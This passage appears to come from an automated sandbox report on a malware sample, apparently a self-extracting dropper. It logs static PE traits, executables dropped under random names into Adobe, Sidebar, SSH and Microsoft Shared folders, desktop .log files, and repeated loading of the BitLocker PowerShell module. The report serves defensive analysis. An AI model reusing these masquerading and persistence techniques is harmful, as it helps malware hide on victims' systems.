                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: ZZ2sTsJFrt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ZZ2sTsJFrt.exe
                                    Source: ZZ2sTsJFrt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: ZZ2sTsJFrt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: ZZ2sTsJFrt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: ZZ2sTsJFrt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: ZZ2sTsJFrt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeFile created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\__tmp_rar_sfx_access_check_3992140Jump to behavior
                                    Source: ZZ2sTsJFrt.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1F640 push ecx; ret 0_2_00F1F653
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1EB78 push eax; ret 0_2_00F1EB96
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeCode function: 4_2_00007FFD9BAA00BD pushad ; iretd 4_2_00007FFD9BAA00C1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeCode function: 4_2_00007FFD9BC07568 push edx; retf 4_2_00007FFD9BC0756B
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeCode function: 4_2_00007FFD9BC05D02 push es; iretd 4_2_00007FFD9BC05D07
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeCode function: 4_2_00007FFD9BEA68B3 push esp; ret 4_2_00007FFD9BEA68B9
                                    Source: HyperPortContainerproviderinto.exe.0.drStatic PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe.4.drStatic PE information: section name: .text entropy: 7.564500355462243
                                    Source: dasHost.exe.4.drStatic PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe0.4.drStatic PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe1.4.drStatic PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe2.4.drStatic PE information: section name: .text entropy: 7.564500355462243

                                    Persistence and Installation Behavior

                                    barindex
                                    Drops executable to a common third party application directory
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\kCewxyIz.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\KRFbuSND.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\kKNOcijE.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\VVwrSJqk.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\kwtgfRAG.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\iczfvMBI.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\ufMwPuFo.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\AXpVrZKc.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\Default\Pictures\AaHCyFZRuOMjGDqdgJ.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\EZcCRmIO.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\MjEjEgzx.logJump to dropped file
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeFile created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\cYVGOFtR.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\vqImhKDh.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\KRFbuSND.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\kKNOcijE.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\EZcCRmIO.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\vqImhKDh.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\kCewxyIz.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\Desktop\cYVGOFtR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\iczfvMBI.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\VVwrSJqk.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\ufMwPuFo.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\kwtgfRAG.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\AXpVrZKc.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile created: C:\Users\user\Desktop\MjEjEgzx.logJump to dropped file

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
